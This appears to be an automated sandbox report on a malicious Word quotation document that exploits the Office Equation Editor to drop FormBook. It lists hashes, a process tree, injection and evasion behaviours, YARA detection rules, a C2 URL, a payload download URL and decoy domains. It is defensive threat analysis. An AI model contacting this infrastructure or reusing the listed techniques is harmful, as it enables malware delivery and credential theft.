Play interactive tour

Edit tour

Windows Analysis Report QUOTATION1100630004R2.doc

Overview

General Information

Sample Name:	QUOTATION1100630004R2.doc
Analysis ID:	452514
MD5:	a3336f2a85c572aab40243c347ebfe59
SHA1:	f6b300530f6d294ea005b13ec08d881c9651f8af
SHA256:	9604fbb0d387877ea857295c8b350e75d5adedc3907bc25f19baf16fff3b0d05
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2848 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2376 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

princedan85671.exe (PID: 2240 cmdline: C:\Users\user\AppData\Roaming\princedan85671.exe MD5: 0E715DB2198FF670F4BF0E88E0E9B547)

princedan85671.exe (PID: 532 cmdline: C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui MD5: 0E715DB2198FF670F4BF0E88E0E9B547)

explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

netsh.exe (PID: 2288 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: 784A50A6A09C25F011C3143DDD68E729)

cmd.exe (PID: 2276 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x6bb10:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x6bd8a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x778ad:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x77399:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x779af:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x77b27:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6c7a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x76614:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x6d49b:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x7d54f:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x7e552:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x7a631:$sqlite3step: 68 34 1C 7B E1 0x7a744:$sqlite3step: 68 34 1C 7B E1 0x7a660:$sqlite3text: 68 38 2A 90 C5 0x7a785:$sqlite3text: 68 38 2A 90 C5 0x7a673:$sqlite3blob: 68 53 D8 7F 8C 0x7a79b:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2c2e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2c562:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x54308:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x54582:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x600a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x37b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x5fb91:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x38187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x601a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x382ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x6031f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2cf7a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x54f9a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x36dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x5ee0c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2dc73:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x55c93:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3dd27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x65d47:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x3ed2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x3ae09:$sqlite3step: 68 34 1C 7B E1 0x3af1c:$sqlite3step: 68 34 1C 7B E1 0x62e29:$sqlite3step: 68 34 1C 7B E1 0x62f3c:$sqlite3step: 68 34 1C 7B E1 0x3ae38:$sqlite3text: 68 38 2A 90 C5 0x3af5d:$sqlite3text: 68 38 2A 90 C5 0x62e58:$sqlite3text: 68 38 2A 90 C5 0x62f7d:$sqlite3text: 68 38 2A 90 C5 0x3ae4b:$sqlite3blob: 68 53 D8 7F 8C 0x3af73:$sqlite3blob: 68 53 D8 7F 8C 0x62e6b:$sqlite3blob: 68 53 D8 7F 8C 0x62f93:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x2aa08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x2ac82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x367a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x36291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x368a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x36a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x2b69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3550c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x2c393:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x3c447:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x3d44a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x39529:$sqlite3step: 68 34 1C 7B E1 0x3963c:$sqlite3step: 68 34 1C 7B E1 0x39558:$sqlite3text: 68 38 2A 90 C5 0x3967d:$sqlite3text: 68 38 2A 90 C5 0x3956b:$sqlite3blob: 68 53 D8 7F 8C 0x39693:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 22 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.princedan85671.exe.400000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.princedan85671.exe.400000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.princedan85671.exe.400000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18409:$sqlite3step: 68 34 1C 7B E1 0x1851c:$sqlite3step: 68 34 1C 7B E1 0x18438:$sqlite3text: 68 38 2A 90 C5 0x1855d:$sqlite3text: 68 38 2A 90 C5 0x1844b:$sqlite3blob: 68 53 D8 7F 8C 0x18573:$sqlite3blob: 68 53 D8 7F 8C
6.2.princedan85671.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.princedan85671.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.princedan85671.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17609:$sqlite3step: 68 34 1C 7B E1 0x1771c:$sqlite3step: 68 34 1C 7B E1 0x17638:$sqlite3text: 68 38 2A 90 C5 0x1775d:$sqlite3text: 68 38 2A 90 C5 0x1764b:$sqlite3blob: 68 53 D8 7F 8C 0x17773:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2376, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2376, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\princedan85671.exe, CommandLine: C:\Users\user\AppData\Roaming\princedan85671.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\princedan85671.exe, NewProcessName: C:\Users\user\AppData\Roaming\princedan85671.exe, OriginalFileName: C:\Users\user\AppData\Roaming\princedan85671.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2376, ProcessCommandLine: C:\Users\user\AppData\Roaming\princedan85671.exe, ProcessId: 2240

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://topv.xyz/princedanx.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.containerflippers.com/np0c/"], "decoy": ["spartansurebets.com", "threelakestradingco.com", "metaspace.global", "zjenbao.com", "directlyincluded.press", "peterchadri.com", "learnhousebreaking.com", "wonobattle.online", "leadate.com", "shebafarmscali.com", "top4thejob.online", "awakeyourfaith.com", "bedford-st.com", "lolwhats.com", "cucurumbel.com", "lokalbazaar.com", "matter.pro", "eastcountyanimalrescue.com", "musesgirl.com", "noordinarydairy.com", "saigonstar2.com", "farmacias-aranda.com", "fjzzck.com", "createandelevate.solutions", "australiavapeoil.com", "imperfectlymassabella.com", "criminalmindeddesign.com", "silverstoneca.com", "scotlandpropertygroup.com", "3dvbuild.com", "privatebeautysuites.com", "driplockerstore.com", "rcdesigncompany.com", "2141cascaderdsw.com", "mybbblog.com", "bodyambrosia.com", "solitudeblog.com", "coworkingofficespaces.com", "9999cpa.com", "flipwo.com", "dynamicfitnesslife.store", "anandsharmah.com", "afyz-jf7y.net", "erikagrandstaff.com", "pumpfoil.com", "bodurm.com", "goldlifetime.com", "a1organ.com", "akomandr.com", "hsavvysupply.com", "dyvyn.com", "bizlikeabosslady.network", "livein.space", "helpafounderout.com", "orbmena.com", "mrrodgersrealty.com", "roxhomeswellington.com", "klimareporter.com", "1040fourthst405.com", "blackbuiltbusinesses.com", "solidswim.com", "lordetkinlik3.com", "gardencontainerbar.com", "viperporn.net"]}

Multi AV Scanner detection for domain / URL

Show sources

Source: topv.xyz

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\princedan85671.exe	ReversingLabs: Detection: 23%

Multi AV Scanner detection for submitted file

Show sources

Source: QUOTATION1100630004R2.doc	Virustotal: Detection: 33%			Perma Link
Source: QUOTATION1100630004R2.doc	ReversingLabs: Detection: 34%

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY

Source: 6.2.princedan85671.exe.400000.2.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\princedan85671.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\princedan85671.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

